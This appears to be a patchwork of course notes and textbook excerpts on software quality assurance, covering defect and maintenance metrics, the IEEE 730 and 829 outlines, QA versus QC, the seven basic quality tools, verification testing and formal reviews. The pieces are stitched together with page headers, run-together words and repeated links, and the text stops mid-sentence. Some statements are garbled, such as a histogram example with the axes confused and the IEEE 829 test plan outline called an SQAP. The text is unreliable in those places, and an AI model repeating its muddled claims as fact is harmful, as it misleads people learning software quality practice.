_ Count lines as physical lines on an input screen. _ Count lines as terminated by logical delimiters. Customer Problems Metric The problems metric is usually expressed in terms of problems per user month (PUM): PUM = Total problems that customers reported (true defects and non-defect-oriented problems) for a time period ÷ Total number of license-months of the software during the period where Number of license-months = Number of install licenses of the software × Number of months in the calculation period Customer Satisfaction Metrics Customer satisfaction is often measured by customer survey data via the five-point scale: _ Very satisfied _ Satisfied _ Neutral _ Dissatisfied _ Very dissatisfied. Satisfaction with the overall quality of the product and its specific dimensions is usually obtained through various methods of customer surveys. II. In-Process Quality Metrics Because our goal is to understand the programming process and to learn to engineer quality into the process, in-process quality metrics play an important role. In-process quality metrics are less formally defined than end-product metrics, and their practices vary greatly among software developers. On the one hand, in-process quality metrics simply means tracking defect arrival during formal machine testing for some organizations. On the other hand, some software organizations with well-established software metrics programs cover various parameters in each phase of the development cycle III. Metrics for Software Maintenance When development of a software product is complete and it is released to the market, it enters the maintenance phase of its life cycle. During this phase the defect arrivals by time interval and customer problem calls (which may or may not be defects) by time interval are the de facto metrics. However, the number of defect or problem

arrivals is largely determined by the development process before the maintenance phase. Not much can be done to alter the quality of the product during this phase. Therefore, these two de facto metrics, although important, do not reflect the quality of software maintenance. What can be done during the maintenance phase is to fix the defects as soon as possible and with excellent fix quality. Such actions, although still not able to improve the defect rate of the product, can improve customer satisfaction to a large extent. The following metrics are therefore very important: _ Fix backlog and backlog management index _ Fix response time and fix responsiveness _ Percent delinquent fixes _ Fix quality 1 Fix Backlog and Backlog Management Index Fix backlog is a workload statement for software maintenance. It is related to both the rate of defect arrivals and the rate at which fixes for reported problems become available. It is a simple count of reported problems that remain at the end of each month or each week. Using it in the format of a trend chart, this metric can provide meaningful information for managing the maintenance process. Another metric to manage the backlog of open, unresolved, problems is the backlog management index (BMI).

2 Fix Response Time and Fix Responsiveness For many software development organizations, guidelines are established on the time limit within which the fixes should be available for the reported defects. Usually the criteria are set in accordance with the severity of the problems. For the critical situations in which the customers’ businesses are at risk due to defects in the software product, software developers or the software change teams work around the clock to fix the problems. For less severe defects for which circumventions are available, the required fix response time is more relaxed. 3 Percent Delinquent Fixes The mean (or median) response time metric is a central tendency measure. A more sensitive metric is the percentage of delinquent fixes. For each fix, if the turnaround time greatly exceeds the required response time, then it is classified as delinquent:

IEEE standards 1. IEEE 730-2002

There are three groups to whom this standard applies or may affect: the user, the supplier, and the public. a) The user, who may be another element of the same organization developing the software, has a need for the product. Further, the user needs the product to meet the requirements identified in the specification. The user thus cannot afford a "hands-off" attitude toward the supplier and rely solely on a test to be executed at the end of the software development time period. If the product should fail, not only does the same need still exist, but also a portion of the development time has been lost. Therefore, the user needs to obtain a reasonable degree of confidence that the product is in the process of acquiring required attributes during software development. b) The supplier needs an established standard against which to plan and to be measured. It is unreasonable to expect a complete reorientation from project to project. Not only is it not cost effective, but, unless there exists a stable framework on which to base changes, improvement cannot be made. c) The public may be affected by the use of the product. The public may include, for example, depositors at a bank or passengers using a reservation system. The public users have requirements, such as legal rights, which preclude haphazard development of software. At some later date, the provider of the services to the public user and the supplier may be required to show that they acted in a reasonable and prudent professional manner to ensure that required software attributes were acquired.

Contents

1. Purpose

2. Reference documents

3. Management

4. Documentation

5. Standards, practices, convention, and metrics

6. Software Reviews

7. Tests

8. Problem reporting and corrective actions

9. Tools, techniques, and methodologies

10. Media control

11. Supplier control

12. Records collection, maintenance, and retention

13. Training

14. Risk management

15. Glossary

16. SQAP change procedure and history

2. IEEE 829-2008

Unlike IEEE 730, our IEEE 829 friend is a longer standard, it’s more than a 118 pages long. But don’t panic, it’s because the whole standard consists of documents for tests, and the one that we’ll particularly look at this time is the first one, the Test Plan.

The following is the outline of SQAP defined by IEEE 829:

1. Test plan identifier 2. Introduction 3. Test items 4. Features to be tested 5. Features to not to be tested 6. Approach 7. Item pass/fail criteria 8. Suspension criteria and resumption requirements 9. Test deliverables 10. Testing tasks 11. Environmental needs 12. Responsibilities 13. Staffing and training needs 14. Schedule 15. Risks and contingencies 16. Additional sections 17. Approvals

Yes, you might expect that there are more sub-items under these list, and you can check them on the following links:

This time, the major part of the document falls on the item 6, the test approach. Because in test plan document we focus on the quality control part of the project, and this is done primarily by testing.

The IEEE Std 829 provides an outline of the Master Test Plan (MTP). MTP involves selecting the constituent parts of the project's test effort, setting the objectives for each part, setting the division of labor in terms of time and resources, and the interrelationships between the parts, identifying the risks, assumptions, and standards of workmanship to be considered and accounted for by the parts, defining the test effort's controls and confirming the applicable objectives set by quality assurance planning. It also identifies the number of levels of test, the overall tasks to be performed and the documentation requirements.

In addition, the IEEE Std 829 recommends that for each test activity, the following topics be addressed.

• Test tasks: Identify the test tasks • Methods: Describe the methods and procedures for each test task, including

tools. Also, define the criteria for evaluating the test task results • Inputs: Identify the required inputs for the test task. Specify the source of each

input. Inputs may be derived from preceding tasks or activities • Outputs: Identify the required outputs from the test task • Schedule: Describe the schedule for the test tasks. Establish specific milestones

for initiating and completing each task, for obtaining input and for delivery of output

• Resources: Identify the resources for the performance of the test tasks. Example of resources include people, tools, equipment, facilities, budgets, etc.

• Risks and Assumptions: Identify any risks and assumptions associated with the test tasks. Include recommendations to eliminate, reduce or mitigate risks identified

• Roles and responsibilities: Identify for each task, who has the primary and secondary responsibilities for task execution and the nature of the roles they will play

Test administration requirements: These are needed to administer tests during execution and involve describing the following.

• Anomaly resolution and reporting process: Describe the method of reporting and resolving anomalies. This would include information about the anomaly criticality levels, authority and time line for resolution.

• Task iteration policy: Describe the criteria for repeating testing tasks when its input is changed or task procedure is changed. Example, re-executing tests after anomalies have been fixed.

• Deviation policy: Describe the procedures and criteria for deviation from the MTP and test documentation. The information for deviations includes task

identification, rationale and effect on product quality. Also, identify the authorities responsible for approving deviations.

• Control procedures: Identify control procedures for test activities. These procedures describe how the system, software products and test results will be configured, protected and stored. They may also describe quality assurance, configuration management, data management, compliance with existing security provisions and how test results are to be protected from unauthorized alterations.

• Standards, practices and conventions: Identify the standards, practices and conventions that govern the performance of testing tasks.

Quality assurance and control processes

Although QA and QC are closely related concepts, and are both aspects of quality management, they are fundamentally different in their focus:

• QC is used to verify the quality of the output; • QA is the process of managing for quality.

Achieving success in a project requires both QA and QC. If we only apply QA, then we have a set of processes that can be applied to ensure great quality in our delivered solution, but the delivered solution itself is never actually quality-checked. Likewise, if we only focus on QC then we are simply conducting tests without any clear vision for making our tests repeatable, for understanding and eliminating problems in testing

In the ISO 9000 standard, clause 3.2.10 defines Quality Control as: “A part of quality management focused on fulfilling quality requirements” Clause 3.2.11 defines Quality Assurance as:

“A part of quality management focused on providing confidence that quality requirements will be fulfilled”

Software Quality Control:

"The function of software quality that checks that the project follows its standards, processes, and procedures, and that the project produces the required internal and external (deliverable) products"

Software Quality Assurance: "The function of software quality that assures that the standards, processes, and procedures are appropriate for the project and are correctly implemented"

Quality Assurance: a Strategy of Prevention

QA is focused on planning, documenting and agreeing on a set of guidelines that are necessary to assure quality. QA planning is undertaken at the beginning of a project, and draws on both software specifications and industry or company standards. The typical outcomes of the QA planning activities are quality plans, inspection and test plans, the selection of defect tracking tools and the training of people in the selected methods and processes. The purpose of QA is to prevent defects from entering into the solution in the first place. In other words, QA is a pro-active management practice that is used to assure a stated level of quality for an IT initiative. Undertaking QA at the beginning of a project is a key tool to mitigate the risks that have been identified during the specification phases. Communication plays a pivotal role in managing project risk, and is crucial for realizing effective QA. Part of any risk mitigation strategy is the clear communication of both the risks, and their associated remedies to the team or teams involved in the project.

Quality Control: a Strategy of Detection

Quality Control, on the other hand, includes all activities that are designed to determine the level of quality of the delivered ICT solutions. QC is a reactive means by which quality is gauged and monitored, and QC includes all operational techniques and activities used to fulfill requirements for quality. These techniques and activities are agreed with customers and/or stakeholders before project work is commenced. QC involves verification of output conformance to desired quality levels. This means that the ICT solution is checked against customer requirements, with various checks being conducted at planned points in the development lifecycle. Teams will use, amongst other techniques, structured walkthroughs, testing and code inspections to ensure that the solution meets the agreed set of requirements.

Benefits of Quality Management

The benefits of a structured approach to quality management cannot be ignored. Quality Control is used, in conjunction with the quality improvement activity, to isolate and provide feedback on the causes of quality problems. By using this approach

consistently, across projects, the feedback mechanism works towards identifying root-cause problems, and then developing strategies to eliminating these problems. Using this holistic approach ensures that teams achieve ever higher levels of quality. As a consequence of formulating and executing a quality management plan the company can expect:

• Greater levels of customer satisfaction, which will very likely result in both repeat business, as well as referral business

• A motivated team that not only understand the policy objectives of the quality management plan, but who also actively participate in executing the plan

• Elimination of waste by eliminating rework arising from either the need to address bugs, or to address gaps in the solution’s ability to meet customer requirements

• Higher levels of confidence in planning, since the tasks arising from unplanned rework will fall away

• Financial rewards for the company, which are a consequence of new projects from existing and referral clients, as well as through the reduction of monies spent on rework tasks.

• Quality Assurance (QA) refers to the process used to create the deliverables, and can be performed by a manager, client, or even a third-party reviewer. Examples of quality assurance include process checklists, project audits and methodology and standards development.

• Quality Control (QC) refers to quality related activities associated with the creation of project deliverables. Quality control is used to verify that deliverables are of acceptable quality and that they are complete and correct. Examples of quality control activities include inspection, deliverable peer reviews and the testing process.

http://www.diffen.com/difference/Leadership_vs_Management

The Difference between Quality Assurance and Quality Control

The following are a few differences between the quality assurance and quality control processes:

• In quality assurance, you plan to avoid the defect in the first place. On the other hand in quality control, you try to find defects and correct them while making the product.

• Quality assurance is all about prevention, and quality control is all about the detection.

• Quality assurance is a proactive process while quality control is a reactive process.

• Quality assurance is a process based approach while quality control is a product based approach.

• Quality assurance involves processes managing quality, and quality control is used to verify the quality of the product.

• Quality audit is an example of quality assurance. Inspection and testing are examples of the quality control process.

• The goal of the quality assurance process is to develop a process so that defects do not arise when you are producing the product, and quality control identifies the defects after the product is produced but is not yet released or is still in the production phase.

The Benefits of Quality Assurance and Quality Control

Quality assurance and quality control are closely related and their objective is also the same, i.e. to deliver a defect-free product. Quality assurance and quality control are an integral part of a quality management plan.

These two processes complement each other, and failing to apply any of these will result in a failure of quality management on the project.

Following these quality management processes brings immense benefits to your organization. Some benefits are as follows:

• It gives you a high quality output. • It increases the efficiency of operations. • It brings customer satisfaction, which affects your brand and helps you grow your

business. • If your product is of good quality, you will not need much rework and there will

not be much after-sale support required. This will help you save a lot of money. • A high level of confidence and a motivated team.

Statistical Quality Control

Quality control techniques require extensive usage of statistical methods. The advantages of the statistical analysis are as follows:

Statistical Tools are automated and therefore, require less manual intervention, leading cost reduction

Statistical tools work on a model thus are very useful where testing requires destruction of products.

Statistical Quality tools can broadly be classified into following categories:

Acceptance sampling is an important part of quality control wherein quality of products is assessed post production.

Statistical process control helps in confirming whether the current process is falling within pre-determined parameters.

Acceptance Sampling

Acceptance sampling is done on sample’s post production to check for quality parameters as decided by the organization covering both attributes as well as variables. If the sample does not meet the required parameters of quality than that given lot is rejected, and further analysis is done to identify the source and rectify the defects. Acceptance sampling is done on the basis of inspection, which includes physical verification of color, size, shape, etc.

The major objectives of inspection are:

To detect and prevent defects in products and process. To identify defected parts or product and prevent it from further consumption or

usage. To highlight the product or process defect to appropriate authorities for

necessary and corrective actions.

Scope of inspection covers input materials, finished material, plant, machinery etc.

To sustain quality of product and services it is important to have in place robust quality control techniques.

Quality Control tools

Most of the organizations use quality tools for various purposes related to controlling and assuring quality.

Although there are a good number of quality tools specific to certain domains, fields and practices, some of the quality tools can be used across such domains. These quality tools are quite generic and can be applied to any condition.

There are seven basic quality tools used in organizations. These tools can provide much information about problems in the organization assisting to derive solutions for the same.

A number of these quality tools come with a price tag. A brief training, mostly a self-training, is sufficient for someone to start using the tools.

Let's have a look at the seven basic quality tools in brief.

1. Flow Charts

This is one of the basic quality tool that can be used for analyzing a sequence of events.

The tool maps out a sequence of events that take place sequentially or in parallel. The flow chart can be used to understand a complex process in order to find the relationships and dependencies between events.

You can also get a brief idea about the critical path of the process and the events involved in the critical path.

Flow charts can be used for any field and to illustrate events involving processes of any complexity. There are specific software tools developed for drawing flow charts, such as MS Visio.

You will be able to freely download some of the open source flow chart tools developed by the open source community.

2. Histogram

Histogram is used for illustrating the frequency and the extent in the context of two variables.

Histogram is a chart with columns. This represents the distribution by mean. If the histogram is normal, the graph takes the shape of a bell curve.

If it is not normal, it may take different shapes based on the condition of the distribution. Histogram can be used to measure something against another thing. Always, it should be two variables.

Consider the following example: The following histogram shows morning attendance of a class. The X-axis is the number of students and the Y-axis the time of the day.

3. Cause and Effect Diagram

Cause and effect diagrams (Ishikawa Diagram) are used for understanding organizational or business problem causes.

Organizations face problems everyday and it is required to understand the causes of these problems in order to solve them effectively. Cause and effect diagrams exercise is usually a teamwork.

A brainstorming session is required in order to come up with an effective cause and effect diagram.

All the main components of a problem area are listed and possible causes from each area is listed.

Then, most likely causes of the problems are identified to carry out further analysis.

4. Check Sheet

A check sheet can be introduced as the most basic tool for quality.

A check sheet is basically used for gathering and organizing data.

When this is done with the help of software packages such as Microsoft Excel, you can derive further analysis graphs and automate through macros available.

Therefore, it is always a good idea to use a software check sheet for information gathering and organizing needs.

One can always use a paper-based check sheet when the information gathered is only used for backup or storing purposes other than further processing.

5. Scatter Diagram

When it comes to the values of two variables, scatter diagrams are the best way to present. Scatter diagrams present the relationship between two variables and illustrate the results on a Cartesian plane.

Then, further analysis, such as trend analysis can be performed on the values.

In these diagrams, one variable denotes one axis and another variable denotes the other axis.

6. Control Charts

Control chart is the best tool for monitoring the performance of a process. These types of charts can be used for monitoring any processes related to function of the organization.

These charts allow you to identify the following conditions related to the process that has been monitored.

• Stability of the process • Predictability of the process • Identification of common cause of variation • Special conditions where the monitoring party needs to react

7. Pareto Charts

Pareto charts are used for identifying a set of priorities. You can chart any number of issues/variables related to a specific concern and record the number of occurrences.

This way you can figure out the parameters that have the highest impact on the specific concern.

This helps you to work on the propriety issues in order to get the condition under control.

Above seven basic quality tools help you to address different concerns in an organization.

Therefore, use of such tools should be a basic practice in the organization in order to enhance the efficiency.

Trainings on these tools should be included in the organizational orientation program, so all the staff members get to learn these basic tools.

291

Verification testing is the most effective way to remove defects from software. If mostof the defects are removed prior to validation testing (i.e., unit, integration, system,and acceptance testing), validation testing can focus on testing to determine whetherthe software meets the true operational needs of the user and can be effectively inte-grated into the computer operations activity.

Because the experience of many testers is limited to unit, integration, systems, andacceptance testing, these testers are not experienced in verification techniques. The veri-fication techniques are not complex, and once understood, can be easily implementedinto the test process.

Typically, verification testing—testing in a static mode—is a manual process. Verifi-cation testing provides two important benefits: defects can be identified close to thepoint where they originate, and the cost to correct defects is significantly less thanwhen detected in dynamic testing.

Verification testing normally occurs during the requirements, design, and programphases of software development, but it can also occur with outsourced software. Thereare many different techniques for verification testing, most of which focus on the docu-mentation associated with building software. This chapter discusses the many differentways to perform verification testing during the requirements, design, and programmingphases of software development.

UNIT II - VERIFICATION

Introduction

Overview

Most but not all verification techniques are manual. However, even in manual tech-niques, automated tools can prove helpful. For example, when conducting a softwarereview, reviewers might want to use templates to record responses to questions.

Because most testing focuses on validation/dynamic testing, verification techniquenames are not consist. Consider, for example, a review, which is an independent inves-tigation of some developmental aspect. Some call these reviews System DevelopmentReviews, others call them End-of-Phase Reviews, still others refer to them as PeerReviews, and some use Requirements Review. Because some of the verification tech-niques are similar, they may also be referred to as a walkthrough or inspection.

For the purposes of this chapter, specific names are assigned to the review techniques,as follows:

■■ Reviews. A review is a formal process in which peers and/or stakeholders chal-lenge the correctness of the work being reviewed. For example, in a requirementsreview, the correctness and completeness of requirements is challenged. It is aformal process usually based on the experience of the organization or outsideexperts, and uses a predetermined set of questions to accomplish the objectivesof the review.

■■ Walkthroughs. A walkthrough is an informal process by which peers and otherstakeholders interact with project personnel to help ensure the best possibleproject is implemented. Frequently, the walkthrough is requested by the projectteam, to resolve issues that they are not sure they have resolved in the mosteffective and efficient manner. For example, they may be uncertain that theyhave the best design for a specific requirement and want an independentprocess to “brainstorm” better methods.

■■ Inspections. Inspections are a very formal process in which peers and projectpersonnel assume very specific roles. The objective of an inspection is to ensurethat the entrance criteria for a specific workbench were correctly implementedinto the exit criteria. The inspection process literally traces the entrance criteriato the exit criteria to ensure that nothing is missing, nothing is wrong, andnothing has been added that was not in the entrance criteria.

■■ Desk debugging. This can be a formal or informal process used by a worker to check the accuracy and completeness of his/her work. It is most beneficialwhen the process is formalized so that the worker has a predefined series ofsteps to perform. The objective is basically the same as an inspection, tracingthe entrance criteria to the exit criteria; unlike the inspection, however, it is performed by the worker who completed the task.

■■ Requirements tracing. Requirements tracing, sometimes called quality func-tion deployment (QFD), ensures that requirements are not lost during imple-mentation. Once defined, the requirements are uniquely identified. They arethen traced from work step to work step to ensure that all the requirementshave been processed correctly through the completion of that process.

292 Chapter 9

■■ Testable requirements. A testable requirement has a built-in validation tech-nique. Incorporation of testable requirements is sometimes referred to as devel-oping a “base case,” meaning that the method of testing all the requirements hasbeen defined. If you use this method, the requirements phase of software devel-opment or contracting cannot be considered complete until the testable compo-nent of each requirement has been defined. Some organizations use testers tohelp define and/or agree to a test that will validate the requirements.

■■ Test factor analysis. This verification technique is unique to the test processincorporated in this book. It is based on the test factors described in an earlierchapter. Under this analysis, a series of questions helps determine whetherthose factors have been appropriately integrated into the software develop-ment process. Note that these test factors are attributes of requirements such as ease of use.

■■ Success factors. Success factors are the factors that normally the customer/userwill define as the basis for evaluating whether the software system meets theirneeds. Success factors correlate closely to project objectives but are in measur-able terms so that it can be determined whether the success factor has beenmet. Acceptance criteria are frequently used as the success factors.

■■ Risk matrix. The objective of a risk matrix is to evaluate the effectiveness ofcontrols to reduce those risks. (Controls are the means organizations use tominimize or eliminate risk.) The risk matrix requires the identification of risk,and then the matching of controls to those risks so an assessment can be madeas to whether the risk has been minimized to an acceptable level.

■■ Static analysis. Most static analysis is performed through software. For exam-ple, most source code compilers have a static analyzer that provides informa-tion as to whether the source code has been correctly prepared. Other staticanalyzers examine code for such things as “non-entrant modules” meaningthat for a particular section of code there is no way to enter that code.

These techniques are incorporated into either the verification process of requirements,design, or programming the software. However, just because a specific technique isincluded in one phase of development does not mean it cannot be used in other phases.Also, some of the techniques can be used in conjunction with one another. For example,a review can be coupled with requirements tracing.

Objective

Research has shown that the longer it takes to find and correct a defect, the more costlythe correction process becomes. The objectives of verification testing during the require-ments, design, and programming phases are twofold. The first is to identify defects asclose to the point were they originated as possible. This will speed up development andat the same time reduce the cost of development. The second objective is to identifyimprovement opportunities. Experienced testers can advise the development group ofbetter ways to implement user requirements, to improve the software design, and/or tomake the code more effective and efficient.

Step 3: Verification Testing 293

Concerns

Testers should have the following concerns when selecting and executing verificationtesting:

■■ Assurance that the best verification techniques will be used. The verificationtechnique can be determined during the development of the test plan or asdetailed verification planning occurs prior to or during an early part of the devel-opmental phase. Based on the objectives to be accomplished, testers will selectone or more of the verification techniques to be used for a specific developmentalphase.

■■ Assurance that the verification technique will be integrated into a develop-

mental process. Development should be a single process, not two parallelprocesses of developing and testing during implementation. Although twoprocesses are performed by potentially different groups, they should be care-fully integrated so that development looks like a single process. This is impor-tant so that both developers and testers know when and who is responsible foraccomplishing a specific task. Without this, developers may not notify testersthat a particular phase has begun or ended, or budget the developer’s time, sothat testers are unable to perform the verification technique. If verification hasbeen integrated into the developmental process, verification will be performed.

■■ Assurance that the right staff and appropriate resources will be available

when the technique is scheduled for execution. Scheduling the staff and fund-ing the execution of the verification technique should occur in parallel with theprevious action of integrating the technique into the process. It is merely theadministrative component of integration, which includes determining who willexecute the technique, when the technique will be executed, and the amount ofresources allocated to the execution of the technique.

■■ Assurance that those responsible for the verification technique are ade-

quately trained. If testers who perform the verification technique have notbeen previously trained, their training should occur prior to executing the veri-fication technique.

■■ Assurance that the technique will be executed properly. The technique shouldbe executed in accordance with the defined process and schedule.

Workbench

Figure 9-1 illustrates the workbench for performing verification testing. The input tothe workbench is the documentation prepared by the development team for the phasebeing tested. Near the end of the requirements, design, and programming phases, theappropriate verification technique will be performed. The quality control proceduresare designed to ensure the verification techniques were performed correctly. At the endof each development phase test, testers should list the defects they’ve uncovered, plusany recommendations for improving the effectiveness and efficiency of the software.

294 Chapter 9

Figure 9-1 The workbench for verification testing.

DO CHECK

Verification

Technique

Performed

Correctly

REWORK

Test During

Requirements

Phase

Task 1

Test During

Design Phase

Task 2

Test During

Programming

Phase

Task 3

Documentation

for the Phase

Being Tested

List of Defects

and

Recommendations

Input

This section describes the inputs required to complete the verification testing duringeach phase of development: requirements, design, and programming.

The Requirements Phase

The requirements phase is undertaken to solve a business problem. The problem andits solution drive the system’s development process. Therefore, it is essential that thebusiness problem be well defined. For example, the business problem might be toimprove accounts receivable collections, reduce the amount of on-hand inventorythrough better inventory management, or improve customer service.

The analogy of building a home illustrates the phases in a system’s development lifecycle. The homeowner’s needs might include increased living space, and the results ofthe requirements phase offer a solution for that need. The requirements phase in build-ing a home would specify the number of rooms, the location of the lot on which thehouse will be built, the approximate cost to construct the house, the type of architec-ture, and so on. At the completion of the requirements phase, the potential home-owner’s needs would be specified. The deliverables produced from the homeowner’srequirements phase would be a functional description of the home and a plot map ofthe lot on which the home is to be constructed. These are the inputs that go to the archi-tect to design the home.

The requirements phase should be initiated by management request and shouldconclude with a proposal to management on the recommended solution for the busi-ness need. The requirements team should study the business problem, the previousmethods of handling the problem, and the consequences of that method, together withany other input pertinent to the problem. Based on this study, the team develops aseries of solutions. The requirements team should then select a preferred solution fromamong these alternatives and propose that solution to management.

The most common deliverables from the requirements phase needed by the testersfor this step include the following:

■■ Proposal to management describing the problem, the alternatives, and propos-ing a solution

■■ Cost/benefit study describing the economics of the proposed solution

■■ Detailed description of the recommended solution, highlighting the recom-mended method for satisfying those needs. (Note: This becomes the input tothe systems design phase.)

■■ List of system assumptions, such as the life of the project, the value of the sys-tem, the average skill of the user, and so on

The Design Phase

The design phase verification process has two inputs: test team understanding of howdesign, both internal and external, occurs; and the deliverables produced during thedesign phase that will be subject to a static test.

296 Chapter 9

The design process could result in an almost infinite number of solutions. The sys-tem design is selected based on an evaluation of multiple criteria, including availabletime, desired efficiency, skill of project team, hardware and software available, as wellas the requirements of the system itself. The design will also be affected by the method-ology and tools available to assist the project team.

In home building, the design phase equivalent is the development of blueprints andthe bill of materials for supplies needed. It is much easier to make changes in the earlyphases of design than in later phases.

From a project perspective, the most successful testing is that conducted early in thedesign phase. The sooner the project team becomes aware of potential defects, thecheaper it is to correct those defects. If the project waited until the end of the designphase to begin testing, it would fall into the same trap as many projects that wait untilthe end of programming to conduct their first tests: When defects are found, the cor-rective process can be so time-consuming and painful that it may appear cheaper tolive with the defects than to correct them.

Testing normally occurs using the deliverables produced during the design phase.The more common design phase deliverables include the following:

Input specifications

Processing specifications

File specifications

Output specifications

Control specifications

System flowcharts

Hardware and software requirements

Manual operating procedure specifications

Data retention policies

The Programming Phase

The more common programming phase deliverables that are input for testing are asfollows:

Program specifications

Program documentation

Computer program listings

Executable programs

Program flowcharts

Operator instructions

In addition, testers need to understand the process used to build the program under test.

Step 3: Verification Testing 297

Walkthroughs, Code Reviews, and Inspections

Our objective with Inspections is to reduce the Cost of Quality by finding and removing defects earlier and at a lower cost. While some testing will always be necessary, we can reduce the costs of test by reducing the volume of defects propagated to test.

—Ron Radice (2002)

When you catch bugs early, you also get fewer compound bugs. Compound bugs are two separate bugs that interact: you trip going downstairs, and when you reach for the handrail it comes off in your hand.

—Paul Graham (2001)

Here’s a shocker: your main quality objective in software development is to get a working program to your user that meets all their requirements and has no defects. That’s right: your code should be perfect. It meets all the user’s requirements and it has no errors in it when you deliver it. Impossible, you cry? Can’t be done? Well, software quality assurance is all about trying to get as close to perfection as you can – albeit within time and budget. (You knew there was a catch, didn’t you?)

Software quality is usually discussed from two different perspectives, the user’s and the developer’s. From the user’s perspective, quality has a number of characteristics – things that your program must do in order to be accepted by the user – among which are:1

• Correctness: The software has to work, period.

• Usability: It has to be easy to learn and easy to use.

Verification techniques

http://www.it-ebooks.info

CHAPTER 15 WALKTHROUGHS, CODE REVIEWS, AND INSPECTIONS

• Reliability: It has to stay up and be available when you need it.

• Security: The software has to prevent unauthorized access and it has to protectyour data.

• Adaptability: It should be easy to add new features.

From the developer’s perspective, things are a bit different. The developer wants to see the following:

• Maintainability: It has to be easy to make changes to the software.

• Portability: It has to be easy to move the software to a different platform.

• Readability: Many developers won’t admit this, but you do need to be able to readthe code.

• Understandability: The code needs to be designed in such a way that a newdeveloper can understand how it all hangs together.

• Testability: Well, at least the testers think that your code should be easy to test. Code that is created in a modular fashion, with short functions that do only onething, is much easier to understand and test than code that is all just one bigmain() function.

Software Quality Assurance (SQA) has three legs to it:

• Testing: Finding the errors that surface while your program is executing, alsoknown as dynamic analysis.

• Debugging: Getting all the obvious errors out of your code, the ones that are foundby testing it.

• Reviews: Finding the errors that are inherently in your code as it sits there, alsoknown as static analysis.

Many developers – and managers – think that you can test your way to quality. You can’t. As we saw in the last chapter, tests are limited. You often can’t explore every code path, you can’t test every possible data combination, and often your tests themselves are flawed. Tests can only get you so far. As Edsger Dijkstra famously said, “...program testing can be a very effective way to show the presence of bugs, but it is hopelessly inadequate for showing their absence.”2

Reviewing your code – reading it and looking for errors on the page – provides another mechanism for making sure that you’ve implemented the user’s requirements and the resulting design correctly. In fact, most development organizations that use a plan-driven methodology will not only review code, they’ll also review the requirements document, the architecture, the design specification, the test plan, the tests themselves, and the user documentation. In short, all the work products produced by the software development organization. Organizations that use an agile development methodology don’t necessarily have all the documents mentioned above, but they do have requirements, user stories, user documentation, and especially code to review. In this chapter we’ll focus on reviewing your code.


15.5 INFORMAL REVIEWS

Informal reviews include a simple desk check of a software engineering work

product with a colleague, a casual meeting (involving more than two people) for

the purpose of reviewing a work product, or the review-oriented aspects of pair

programming (Chapter 3).

A simple desk check or a casual meeting conducted with a colleague is a review.

However, because there is no advance planning or preparation, no agenda or meet-

ing structure, and no follow-up on the errors that are uncovered, the effectiveness of

such reviews is considerably lower than more formal approaches. But a simple desk

check can and does uncover errors that might otherwise propagate further into the

software process.

One way to improve the efficacy of a desk check review is to develop a set of sim-

ple review checklists for each major work product produced by the software team.

The questions posed within the checklist are generic, but they will serve to guide the

reviewers as they check the work product. For example, let’s reexamine a desk check

of the interface prototype for SafeHomeAssured.com. Rather than simply playing

with the prototype at the designer’s workstation, the designer and a colleague

examine the prototype using a checklist for interfaces:

• Is the layout designed using standard conventions? Left to right? Top to

bottom?

• Does the presentation need to be scrolled?

• Are color and placement, typeface, and size used effectively?

• Are all navigation options or functions represented at the same level of

abstraction?

• Are all navigation choices clearly labeled?

pre75977_ch15.qxd 11/27/08 5:54 PM Page 424

reviews

and so on. Any errors or issues noted by the reviewers are recorded by the designer

for resolution at a later time. Desk checks may be scheduled in an ad hoc manner,

or they may be mandated as part of good software engineering practice. In general,

the amount of material to be reviewed is relatively small and the overall time spent

on a desk check spans little more than one or two hours.

In Chapter 3, I described pair programming in the following manner: “XP recom-

mends that two people work together at one computer workstation to create code

for a story. This provides a mechanism for real-time problem solving (two heads are

often better than one) and real-time quality assurance.”

Pair programming can be characterized as a continuous desk check. Rather than

scheduling a review at some point in time, pair programming encourages continu-

ous review as a work product (design or code) is created. The benefit is immediate

discovery of errors and better work product quality as a consequence.

In their discussion of the efficacy of pair programming, Williams and Kessler

[Wil00] state:

Anecdotal and initial statistical evidence indicates that pair programming is a powerful

technique for productively generating high quality software products. The pair works and

shares ideas together to tackle the complexities of software development. They continu-

ously perform inspections on each other’s artifacts leading to the earliest, most efficient

form of defect removal possible. In addition, they keep each other intently focused on the

task at hand.

Some software engineers argue that the inherent redundancy built into pair pro-

gramming is wasteful of resources. After all, why assign two people to a job that one

person can accomplish? The answer to this question can be found in Section 15.3.2.

If the quality of the work product produced as a consequence of pair programming

is significantly better than the work of an individual, the quality-related savings can

more than justify the “redundancy” implied by pair programming.

CHAPTER 15 REVIEW TECHNIQUES 425

pre75977_ch15.qxd 11/27/08 5:54 PM Page 425

http://sw-assurance.gsfc.nasa.gov/disciplines/

http://sw-assurance.gsfc.nasa.gov/disciplines/

http://www.processimpact.com/pr_goodies.shtml

http://www.processimpact.com/pr_goodies.shtml

http://www.softwaredioxide.com/Channels/ConView.asp?id=6309

http://www.softwaredioxide.com/Channels/ConView.asp?id=6309

http://www.macadamian.com

http://www.opengroup.org/architecture/togaf7-doc/arch/p4/comp/clists/syseng.htm

http://www.opengroup.org/architecture/togaf7-doc/arch/p4/comp/clists/syseng.htm

http://www.dfas.mil/technology/pal/ssps/docstds/spm036.doc

http://www.dfas.mil/technology/pal/ssps/docstds/spm036.doc

15.6 FORMAL TECHNICAL REVIEWS

A formal technical review (FTR) is a software quality control activity performed by

software engineers (and others). The objectives of an FTR are: (1) to uncover errors

in function, logic, or implementation for any representation of the software; (2) to

verify that the software under review meets its requirements; (3) to ensure that the

software has been represented according to predefined standards; (4) to achieve

software that is developed in a uniform manner; and (5) to make projects more man-

ageable. In addition, the FTR serves as a training ground, enabling junior engineers

to observe different approaches to software analysis, design, and implementation.

The FTR also serves to promote backup and continuity because a number of people

become familiar with parts of the software that they may not have otherwise seen.

The FTR is actually a class of reviews that includes walkthroughs and inspections.

Each FTR is conducted as a meeting and will be successful only if it is properly

planned, controlled, and attended. In the sections that follow, guidelines similar to

those for a walkthrough are presented as a representative formal technical review.

If you have interest in software inspections, as well as additional information on

walkthroughs, see [Rad02], [Wie02], or [Fre90].

15.6.1 The Review Meeting

Regardless of the FTR format that is chosen, every review meeting should abide by

the following constraints:

• Between three and five people (typically) should be involved in the review.

• Advance preparation should occur but should require no more than two

hours of work for each person.

• The duration of the review meeting should be less than two hours.

Given these constraints, it should be obvious that an FTR focuses on a specific (and

small) part of the overall software. For example, rather than attempting to review an

entire design, walkthroughs are conducted for each component or small group of

components. By narrowing the focus, the FTR has a higher likelihood of uncovering

errors.

The focus of the FTR is on a work product (e.g., a portion of a requirements model,

a detailed component design, source code for a component). The individual who has

